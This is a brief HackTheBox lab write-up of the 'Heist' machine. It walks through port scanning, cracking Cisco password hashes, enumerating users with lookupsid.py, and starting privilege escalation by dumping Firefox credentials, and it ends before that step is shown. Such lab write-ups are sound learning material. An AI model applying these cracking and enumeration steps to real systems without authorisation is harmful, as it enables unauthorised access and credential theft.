Heist (HackTheBox)

3 min readJul 11, 2021

Heist is an easy-rated HackTheBox machine. I did password cracking and username enumeration. Privilege escalation was very common firefox dump credentials. I would recommend this box to everyone.

NMAP

As always I run NMAP to check out which ports or services are running on the victim machine. “-p-” switch can take some time but it is always good to put it.

nmap -sC -sV -A -p- <targetip>

Website Enumeration

On port 80 , we have a website that needs a credentials but we don’t know credentials so first step that we need to follow is log in as guest and see what attachment has inside.

We have 3 passwords right here. I have never seen this kind of passwords. I did some research to find identify these passwords. They are Cisco passwords. I crack them and make a note of outputs.

For the last password, I use Hashcat to crack it but the question is, who owns this password?

I go back to the login as guest page and see a user here. The username is Hazard.

I thought I find the password for Hazard but there is no ssh service running on the victim. “Evil-winrm” is one of the best tools to use when windows machines don’t run ssh. I tried to log in as a Hazard user to the victim machine but “evil-winrm” did not work. I don’t know the reason. At this moment I got stuck a little bit. Then I started looking for other users because I have 2 more passwords to try.

User Enumeration/AD

“lookupsid.py” is a very good python script to brute force usernames. I’m using it because I have credentials for one of the users.

Then I try the other 2 passwords that I have in the previous enumeration and of them, it worked!

Privilege Escalation

I might be the worst person about Windows Privilege Escalation but first thing first I always run the “ps” command to see running services. I saw firefox and I think it must be useful for dump some creds.